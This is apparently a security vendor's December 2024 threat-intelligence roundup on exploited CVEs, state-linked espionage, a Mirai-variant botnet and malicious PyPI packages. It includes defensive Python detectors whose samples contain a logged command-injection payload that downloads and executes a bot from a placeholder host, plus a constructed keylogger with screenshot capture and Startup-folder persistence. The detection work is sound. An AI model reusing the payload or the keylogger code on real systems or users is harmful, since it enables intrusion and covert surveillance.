Welcome to Picus Security's monthly cyber threat intelligence roundup!
Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.
Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.
Latest Vulnerabilities and Exploits in December 2024
In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.
CVE-2024-12356: CISA Adds BeyondTrust Flaw to KEV Catalog Amid Active Exploitation
- Affected Vendor: BeyondTrust
- Affected Products: Privileged Remote Access (PRA) and Remote Support (RS)
- CVEs & Available Fixes:
  - CVE-2024-12356: PRA and RS patches BT24-10-ONPREM1 and BT24-10-ONPREM2
  - CVE-2024-12686: PRA and RS patches BT24-11-ONPREM1 through BT24-11-ONPREM7 (which patch applies depends on the installed version)
On December 19, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog. This critical command injection flaw, with a CVSS score of 9.8, affects BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products. It allows unauthenticated attackers to run arbitrary commands as the site user.
Figure 1. CISA added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog.
CISA cited evidence of active exploitation, urging users of self-hosted software to apply patches (BT24-10-ONPREM1/2) immediately. Cloud instances have already been updated.
The disclosure follows BeyondTrust's confirmation of an incident in which a threat actor used a compromised Remote Support SaaS API key to reset local application account passwords on a limited number of customer instances. The same investigation surfaced a second, medium-severity command injection flaw, CVE-2024-12686, which requires existing administrative privileges and is fixed by the BT24-11 patches listed above. BeyondTrust revoked the key, suspended the affected instances, and notified affected customers.
CISA Adds Palo Alto Networks PAN-OS CVE-2024-3393 to Exploited Vulnerabilities List
- Affected Vendor: Palo Alto Networks
- Affected Product: PAN-OS (DNS Security feature)
- CVE: CVE-2024-3393
- Available Fixes:
- PAN-OS 10.1.14-h8 and later
- PAN-OS 10.2.10-h12 and later
- PAN-OS 11.1.5 and later
- PAN-OS 11.2.3 and later
On December 30, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog, citing active exploitation.
Figure 2. CISA added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog.
This high-severity denial-of-service (DoS) vulnerability affects Palo Alto Networks' PAN-OS software, specifically firewalls that have a DNS Security license and DNS Security logging enabled. An unauthenticated attacker can send a malicious packet through the firewall's data plane that causes the firewall to reboot; repeated attempts force it into maintenance mode, taking it offline until an administrator intervenes.
Palo Alto Networks has released patches to address this issue and recommends that affected users apply the updates promptly. CISA has set a remediation deadline of January 20, 2025, for federal agencies to secure their systems against this vulnerability.
CVE-2024-55956: CISA Adds Cleo File Upload Vulnerability to KEV Catalog
- Affected Vendor: Cleo
- Affected Products: Cleo Harmony, VLTrader, LexiCom
- CVE: CVE-2024-55956
- Available Fixes:
- Update to version 5.8.0.24 or later. Note that the earlier 5.8.0.21 release addressed a separate flaw (CVE-2024-50623) and does not fix CVE-2024-55956.
- Disable the Autorun directory (clear the Autorun Directory setting) so that files dropped on the server are no longer executed automatically; this blocks the command-execution step but does not stop uploads.
- Monitor systems for unauthorized access or unusual activity.
- For detailed instructions, refer to Cleo’s security advisory.
On December 17, 2024, CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog. This critical vulnerability affects Cleo Harmony, VLTrader, and LexiCom, managed file transfer products. The flaw allows unauthenticated attackers to exploit unrestricted file upload capabilities, enabling the execution of arbitrary Bash or PowerShell commands on the host system by leveraging the default Autorun directory settings.
Figure 3. CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog.
CISA highlighted the vulnerability's use in ransomware campaigns, emphasizing its exploitation risk. The agency has set a remediation deadline of January 7, 2025, for federal agencies to secure affected systems.
Cleo has released guidance and mitigations to address the issue. Users are urged to apply the recommended updates or discontinue use if mitigations are unavailable to reduce the risk of exploitation.
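Both the PAN-OS and the Cleo advisories above reduce to the same operational question: is the build running on a given appliance at or above the fixed release? The following script is an added example written for this roundup, not code from Palo Alto Networks, Cleo or Picus. It encodes only the fixed releases listed on this page; the hostnames and builds in the inventory at the bottom are constructed. Two points it handles that a naive string comparison gets wrong: PAN-OS hotfix builds such as 10.2.10-h12 must be ordered as base release plus hotfix number, and a fix only applies within its own major.minor branch, so a build on a branch that has no listed fix (for example the end-of-life 11.0 branch) must be reported separately rather than as fixed.

```python
import re

# Fixed releases named in the Palo Alto Networks advisory for CVE-2024-3393,
# keyed by release branch (major.minor). Anything on the same branch at or
# above the listed build is fixed. A branch missing from this table (for
# example the end-of-life 11.0 branch) has no listed fix and needs manual review.
PANOS_FIXED = {
    (10, 1): "10.1.14-h8",
    (10, 2): "10.2.10-h12",
    (11, 1): "11.1.5",
    (11, 2): "11.2.3",
}

# Cleo Harmony, VLTrader and LexiCom: CVE-2024-55956 is fixed in 5.8.0.24.
CLEO_FIXED = "5.8.0.24"

_PANOS_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$", re.IGNORECASE)


def parse_panos(version: str) -> tuple:
    """Turn '10.2.10-h12' into (10, 2, 10, 12).

    A base release without a hotfix suffix sorts as hotfix 0, so
    10.2.10 < 10.2.10-h12 < 10.2.11, which is how PAN-OS builds order.
    """
    m = _PANOS_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def panos_status(version: str) -> str:
    """Classify a PAN-OS build against CVE-2024-3393.

    Returns 'fixed', 'vulnerable', or 'no-fix-on-branch' when the build's
    major.minor branch is not in the table of fixed releases.
    """
    build = parse_panos(version)
    branch = build[:2]
    if branch not in PANOS_FIXED:
        return "no-fix-on-branch"
    return "fixed" if build >= parse_panos(PANOS_FIXED[branch]) else "vulnerable"


def parse_dotted(version: str) -> tuple:
    """Plain dotted release such as Cleo's '5.8.0.24'."""
    return tuple(int(part) for part in version.strip().split("."))


def cleo_status(version: str) -> str:
    """'fixed' if the Cleo build is 5.8.0.24 or later, else 'vulnerable'."""
    return "fixed" if parse_dotted(version) >= parse_dotted(CLEO_FIXED) else "vulnerable"


if __name__ == "__main__":
    # Constructed inventory: hostnames and builds are made up for the example.
    inventory = [
        ("fw-edge-01", "panos", "10.2.10-h9"),
        ("fw-edge-02", "panos", "10.2.10-h12"),
        ("fw-dc-01", "panos", "11.1.4-h7"),
        ("fw-lab-01", "panos", "11.0.6"),
        ("mft-01", "cleo", "5.8.0.21"),
        ("mft-02", "cleo", "5.8.0.24"),
    ]
    for host, product, ver in inventory:
        status = panos_status(ver) if product == "panos" else cleo_status(ver)
        print(f"{host:<12} {product:<6} {ver:<12} {status}")
```

One caveat before relying on this in an estate: the page lists only the headline fixed releases, while the vendor advisory also names backported hotfixes on older PAN-OS maintenance releases. Add those to PANOS_FIXED (per branch, take the lowest build that is fixed) before treating a "vulnerable" result as final.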
Top Threat Actors Observed in the Wild: December 2024
Here are the most active threat actors that have been observed in December in the wild.
Salt Typhoon Breaches 9th U.S. Telecom as Congress Approves ‘Rip and Replace’ Program Bill
- Victim Location: North America (U.S.)
- Sectors: Telecommunications
- Threat Actor: Salt Typhoon (a.k.a. Earth Estries, FamousSparrow, GhostEmperor, and UNC2286)
- Actor Motivations: Cyber Espionage
- Malware:
- CVE (for initial foothold):
- CVE-2023-46805, CVE-2024-21887 (Ivanti Connect Secure VPN)
- CVE-2023-48788 (Fortinet FortiClient EMS)
- CVE-2022-3236 (Sophos Firewall)
- CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 (Microsoft Exchange – ProxyLogon)
On December 20, 2024, we published the tactics, techniques, and procedures (TTPs) used by the Salt Typhoon APT group in its stealthy cyber espionage campaigns against the telecommunications sector. In the last week of December, the White House confirmed that Salt Typhoon had breached a ninth U.S. telecom provider, with the intrusions focused on unclassified communications and call metadata of U.S. officials. The ninth victim came to light after the administration issued hunting guidance to carriers describing the group's activity, which led the company to identify the compromise on its network.
In parallel, Congress moved to close the funding gap in the Federal Communications Commission's "Rip and Replace" program, which reimburses carriers for removing insecure Chinese-made telecom equipment [2]. The program's cost is estimated at $4.98 billion, leaving a $3.08 billion shortfall against the funds appropriated so far; the bipartisan defense bill directs $3 billion to the program, with further funds expected from spectrum auctions. Completing the removals matters for both national security and rural connectivity, since many of the affected carriers serve rural areas.
The U.S. is intensifying efforts to secure its telecommunications infrastructure amid escalating concerns over Chinese cyber espionage. TP-Link, a Chinese manufacturer holding approximately 65% of the U.S. home and small business router market [3], is under investigation for potential national security risks after vulnerabilities in its devices were exploited in cyberattacks.
Chinese APT 'Salt Typhoon' Breaches U.S. Treasury via Compromised Remote Support Platform
- Victim Location: United States, North America
- Impacted Sector: Federal Government (U.S. Treasury Department)
- Threat Actor: Chinese state-sponsored APT group, per the Treasury Department; publicly associated with Salt Typhoon at the time of reporting
- Actor Motivations: Cyber espionage, targeting sensitive government data and critical communications
- Related CVEs: CVE-2024-12356 and CVE-2024-12686, identified during BeyondTrust's investigation of the incident (BeyondTrust Remote Support SaaS)
On December 8, 2024, BeyondTrust notified the U.S. Treasury Department that a threat actor had compromised the Remote Support SaaS service Treasury uses for remote technical support [4]. Treasury attributed the intrusion to a Chinese state-sponsored APT actor; public reporting at the time associated it with Salt Typhoon. The attacker obtained an API key for the service, used it to reset local application account passwords, and from there gained remote access to Treasury user workstations and accessed unclassified documents. BeyondTrust's investigation of the incident also surfaced the command injection flaws CVE-2024-12356 and CVE-2024-12686 described in the vulnerabilities section above.
BeyondTrust revoked the compromised API key and suspended the affected instances. Treasury reported, based on the investigation with the FBI and CISA, that there was no evidence of continued access. Salt Typhoon has separately been linked to the U.S. telecom breaches, which prompted CISA to recommend end-to-end encrypted messaging apps, while the U.S. considers further restrictions on China Telecom's U.S. operations.
Lazarus Group’s Operation DreamJob Delivers CookiePlus Malware for Defense Evasion
- Victim Location: Undisclosed (employees of nuclear-industry organizations)
- Sectors: Nuclear, previously Defense, Aerospace, and Cryptocurrency
- Threat Actor: Lazarus Group, linked to North Korea
- Actor Motivation: Espionage, data theft, and potential disruption of critical operations
- Malware: Ranid Downloader, CookiePlus, RustyAttr, and other payloads like MISTPEN, RollMid, LPEClient, Charamel Loader, and ServiceChanger
The Lazarus Group, linked to North Korea, has shifted its focus to the nuclear industry, targeting individuals within nuclear organizations. Previously associated with attacks on defense, aerospace, and cryptocurrency sectors, this marks an alarming escalation in their operations. Using fake job postings under “Operation DreamJob,” they deliver malicious files disguised as job assessments to infiltrate systems. Their arsenal includes sophisticated tools like Ranid Downloader and “CookiePlus,” a memory-resident, plugin-based malware that evades traditional security detection [1]. Recent campaigns also exploit zero-day vulnerabilities and deploy innovative malware like “RustyAttr” on macOS. These developments highlight the urgent need for strengthened cybersecurity in sensitive industries to counteract Lazarus Group's increasingly advanced tactics and persistent threat.
Recent Malware Attacks in December
In December 2024, a variety of malware attacks were recorded, highlighting the persistent threat landscape. Below is a detailed list of the active malware incidents for the month.
New Mirai-Based Botnet Exploits RCE Vulnerabilities in DigiEver NVRs and TP-Link Routers
- Victim Location: Global (exposed IoT and network devices worldwide)
- Actor Motivations: Distributed Denial-of-Service (DDoS) attacks, propagation to new devices, and potential further exploitation
- Malware: Mirai-based botnet variant
- CVE:
- CVE-2023-1389 (TP-Link)
- CVE-2018-17532 (Teltonika RUT9XX)
- RCE in DigiEver DS-2105 Pro NVRs (no CVE assigned; unpatched at the time of reporting)
On December 24, 2024, researchers reported a new Mirai-based botnet actively exploiting vulnerabilities in network video recorders (NVRs) and routers, including DigiEver DS-2105 Pro NVRs, TP-Link devices, and Teltonika RUT9XX routers. The campaign, identified as starting in October 2024, uses unpatched remote code execution (RCE) flaws and known vulnerabilities (CVE-2023-1389, CVE-2018-17532) to compromise devices [5].
The botnet exploits improper input validation in the DigiEver NVRs' /cgi-bin/cgi_main.cgi endpoint to inject shell commands into a request parameter. A successful request fetches and runs the malware binary, and the bot adds a cron job so that it survives a reboot; infected devices are then used for distributed denial-of-service (DDoS) attacks and for scanning and infecting further devices.
This botnet uses XOR and ChaCha20 encryption, targeting x86, ARM, and MIPS architectures, signaling evolved tactics among Mirai-based threats.
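The DigiEver vector described above is a command injection through a CGI request parameter, which is visible in the web server's access log if the device keeps one. The following detector is an added example written for this roundup (not code from the researchers cited or from Picus): it parses Common Log Format lines, fully URL-decodes the query string of requests to /cgi-bin/cgi_main.cgi, and flags parameter values containing shell metacharacters or the download-and-run idioms Mirai droppers use. The sample log lines are constructed, the IP addresses are documentation ranges, and the parameter names (cgiName, ntp) are assumptions for illustration, not the exploited parameter as identified by the researchers.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Common Log Format. They are not real captures;
# the IPs are documentation ranges and the parameter names (cgiName, ntp)
# are assumptions used for illustration only.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Dec/2024:03:14:07 +0000] "GET /cgi-bin/cgi_main.cgi?cgiName=time_setting&ntp=pool.ntp.org HTTP/1.1" 200 512
198.51.100.23 - - [24/Dec/2024:03:14:09 +0000] "POST /cgi-bin/cgi_main.cgi?cgiName=time_setting&ntp=%3Bwget%20http%3A%2F%2F192.0.2.10%2Fbot.mips%20-O%20%2Ftmp%2Fx%3Bchmod%20777%20%2Ftmp%2Fx%3B%2Ftmp%2Fx HTTP/1.1" 200 88
198.51.100.23 - - [24/Dec/2024:03:14:10 +0000] "GET /cgi-bin/cgi_main.cgi?cgiName=time_setting&ntp=$(id) HTTP/1.1" 200 88
192.0.2.55 - - [24/Dec/2024:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048
203.0.113.9 - - [24/Dec/2024:03:16:00 +0000] "GET /cgi-bin/cgi_main.cgi?cgiName=time_setting&ntp=time.nist.gov HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TARGET_PATH = "/cgi-bin/cgi_main.cgi"

# Shell metacharacters plus the fetch-chmod-execute idiom Mirai droppers use.
INJECTION_RE = re.compile(
    r"[;|`&]|\$\(|\$\{|\b(wget|curl|tftp|busybox|chmod|nohup|sh)\b|/tmp/|/dev/shm/"
)


def decode_target(target: str):
    """Split a request target into its path and fully decoded query parameters.

    parse_qsl already decodes one layer of percent-encoding; the extra unquote
    catches double-encoded payloads such as %253B (-> %3B -> ';').
    """
    parts = urlsplit(target)
    params = [(k, unquote(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return parts.path, params


def find_injection_attempts(log_text: str) -> list:
    """Return one record per request to the CGI endpoint whose parameters
    contain injection markers: source IP, timestamp, parameter, decoded value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, params = decode_target(m["target"])
        if path != TARGET_PATH:
            continue
        for name, value in params:
            if INJECTION_RE.search(value):
                hits.append({"src": m["src"], "ts": m["ts"], "param": name, "value": value})
                break
    return hits


def offending_sources(hits) -> Counter:
    """Count attempts per source IP, which is what you would feed a block list."""
    return Counter(h["src"] for h in hits)


if __name__ == "__main__":
    found = find_injection_attempts(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']}  {h['src']:<15} {h['param']}={h['value']!r}")
    print("per source:", dict(offending_sources(found)))
```

Tune INJECTION_RE to the device: the time-setting parameter here should only ever hold a hostname or IP, so an even tighter rule is to allow-list the expected syntax and alert on anything else, which also catches encodings this pattern does not anticipate.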
Malicious PyPI Packages 'Zebo' and 'Cometlogger' Stole Data from Hundreds of Downloads
- Victim Location: United States, China, Russia, India (Global impact)
- Sectors: General Public, Developers (via PyPI ecosystem)
- Threat Actor: Unknown (Malware authors leveraging PyPI repository)
- Actor Motivations: Data exfiltration, credential theft, and unauthorized account access
- Malware: Zebo, Cometlogger
Fortinet FortiGuard Labs flagged two malicious Python packages, zebo and cometlogger, uploaded to the Python Package Index (PyPI). Together, these packages were downloaded 282 times—zebo 118 times and cometlogger 164 times—targeting users primarily in the U.S., China, Russia, and India. Both packages have since been removed from PyPI [6].
Zebo acted as spyware, leveraging obfuscation techniques to hide its command-and-control (C2) server. It logged keystrokes using the pynput library, captured hourly screenshots via ImageGrab, and exfiltrated data to ImgBB. Persistence was achieved by adding scripts to the Windows Startup folder.
Cometlogger was more advanced, siphoning credentials, cookies, and tokens from platforms like Discord, Steam, and TikTok. It also harvested system metadata, clipboard content, and network details, bypassed virtualized environments, and terminated browser processes to maximize its reach.
These incidents highlight the risk of installing unvetted packages from public repositories: review a package's source and publisher before installing it, pin known-good versions, and watch for imports and behaviours that a utility library has no reason to have.
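The behaviours attributed to zebo and cometlogger above (keystroke capture with pynput, screenshots via ImageGrab, a hex-obfuscated C2 address, persistence through the Windows Startup folder) all leave traces in a package's source before it ever runs. The scanner below is an added example for this roundup, not the packages' code and not a Fortinet or Picus tool. It walks a module's AST and reports suspicious imports, call sites and string literals. SUSPICIOUS_SOURCE is a constructed stand-in that reproduces those behaviours for the scanner to find; it is not the real zebo or cometlogger source, and the hex literal in it decodes to a placeholder example.com URL.

```python
import ast
import re
from typing import Optional

# Constructed stand-in for a package's __init__.py. It is NOT the real zebo
# or cometlogger source; it only reproduces the behaviours the report
# describes (keylogging, screenshots, Startup-folder persistence, an
# obfuscated C2 string) so the scanner has something to find.
SUSPICIOUS_SOURCE = '''
import os
from pynput import keyboard
from PIL import ImageGrab

# hex-encoded "https://example.com/up" (placeholder, not a real C2)
_c2 = bytes.fromhex("68747470733a2f2f6578616d706c652e636f6d2f7570").decode()

def _on_press(key):
    with open(os.path.join(os.getenv("TEMP", "/tmp"), "k.txt"), "a") as f:
        f.write(str(key))

def _shot():
    ImageGrab.grab().save("s.png")

def _persist():
    startup = os.path.join(os.getenv("APPDATA", ""), "Microsoft", "Windows",
                           "Start Menu", "Programs", "Startup", "run.bat")
    with open(startup, "w") as f:
        f.write("python " + __file__)

keyboard.Listener(on_press=_on_press).start()
'''

BENIGN_SOURCE = '''
import json

def load(path):
    with open(path) as f:
        return json.load(f)
'''

# Modules whose mere import in a small utility package deserves a look.
SUSPICIOUS_MODULES = {
    "pynput": "keystroke capture (pynput)",
    "PIL.ImageGrab": "screenshot capture (PIL.ImageGrab)",
    "pyperclip": "clipboard access (pyperclip)",
    "win32clipboard": "clipboard access (win32clipboard)",
}

# Call sites matching the behaviours in the report.
SUSPICIOUS_CALLS = {
    "keyboard.Listener": "keystroke capture (pynput listener)",
    "ImageGrab.grab": "screenshot capture",
    "bytes.fromhex": "hex-decoded literal (possible hidden C2 address)",
    "base64.b64decode": "base64-decoded literal (possible hidden C2 address)",
    "os.system": "command execution",
    "subprocess.Popen": "command execution",
    "subprocess.run": "command execution",
}

STARTUP_RE = re.compile(r"(^|[\\/])Startup([\\/]|$)")
HEX_BLOB_RE = re.compile(r"^[0-9a-fA-F]{32,}$")


def dotted_name(node: ast.AST) -> Optional[str]:
    """Render a Name/Attribute chain such as subprocess.Popen as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class IndicatorVisitor(ast.NodeVisitor):
    def __init__(self):
        self.findings = []

    def _flag(self, node, reason):
        self.findings.append(f"line {node.lineno}: {reason}")

    def _check_module(self, name, node):
        for prefix, reason in SUSPICIOUS_MODULES.items():
            if name == prefix or name.startswith(prefix + "."):
                self._flag(node, reason)

    def visit_Import(self, node):
        for alias in node.names:
            self._check_module(alias.name, node)
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        base = node.module or ""
        self._check_module(base, node)
        for alias in node.names:          # "from PIL import ImageGrab" -> PIL.ImageGrab
            self._check_module(f"{base}.{alias.name}", node)
        self.generic_visit(node)

    def visit_Call(self, node):
        reason = SUSPICIOUS_CALLS.get(dotted_name(node.func) or "")
        if reason:
            self._flag(node, reason)
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str):
            if STARTUP_RE.search(node.value):
                self._flag(node, "Windows Startup folder path (persistence)")
            if HEX_BLOB_RE.match(node.value):
                self._flag(node, "long hex literal (obfuscated string)")
        self.generic_visit(node)


def scan_source(source: str) -> list:
    """Return de-duplicated, human-readable indicators found in one module."""
    visitor = IndicatorVisitor()
    visitor.visit(ast.parse(source))
    return list(dict.fromkeys(visitor.findings))


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SOURCE), ("benign", BENIGN_SOURCE)):
        print(label, scan_source(src) or ["no indicators"])
```

Run it over every .py file in a freshly downloaded sdist or wheel (unpacked, never installed) before the package is allowed into a build; a keylogging or screenshot import in something that claims to be a logging or utility library is reason enough to stop.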
References
[1] D. Ahmed, “Lazarus Group Targets Nuclear Industry with CookiePlus Malware,” Hackread - Latest Cybersecurity, Tech, Crypto & Hacking News, Dec. 23, 2024. Available: https://hackread.com/lazarus-group-nuclear-industry-cookieplus-malware/. [Accessed: Dec. 30, 2024]
[2] A. Khaitan, “US House to Vote on $3 Billion Funding for Removal of Chinese Telecom Equipment,” The Cyber Express, Dec. 24, 2024. Available: https://thecyberexpress.com/us-house-to-vote-on-rip-and-replace-program/. [Accessed: Dec. 30, 2024]
[3] The Wall Street Journal, “U.S. Weighs Ban on Chinese-Made Router in Millions of American Homes,” Dec. 18, 2024. Available: https://www.wsj.com/politics/national-security/us-ban-china-router-tp-link-systems-7d7507e6
[4] L. Abrams, “US Treasury Department breached through remote support platform,” BleepingComputer, Dec. 30, 2024. Available: https://www.bleepingcomputer.com/news/security/us-treasury-department-breached-through-remote-support-platform/. [Accessed: Jan. 02, 2025]
[5] B. Toulas, “New botnet exploits vulnerabilities in NVRs, TP-Link routers,” BleepingComputer, Dec. 24, 2024. Available: https://www.bleepingcomputer.com/news/security/new-botnet-exploits-vulnerabilities-in-nvrs-tp-link-routers/. [Accessed: Jan. 02, 2025]
[6] The Hacker News, “Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts,” The Hacker News, Dec. 24, 2024. Available: https://thehackernews.com/2024/12/researchers-uncover-pypi-packages.html. [Accessed: Jan. 02, 2025]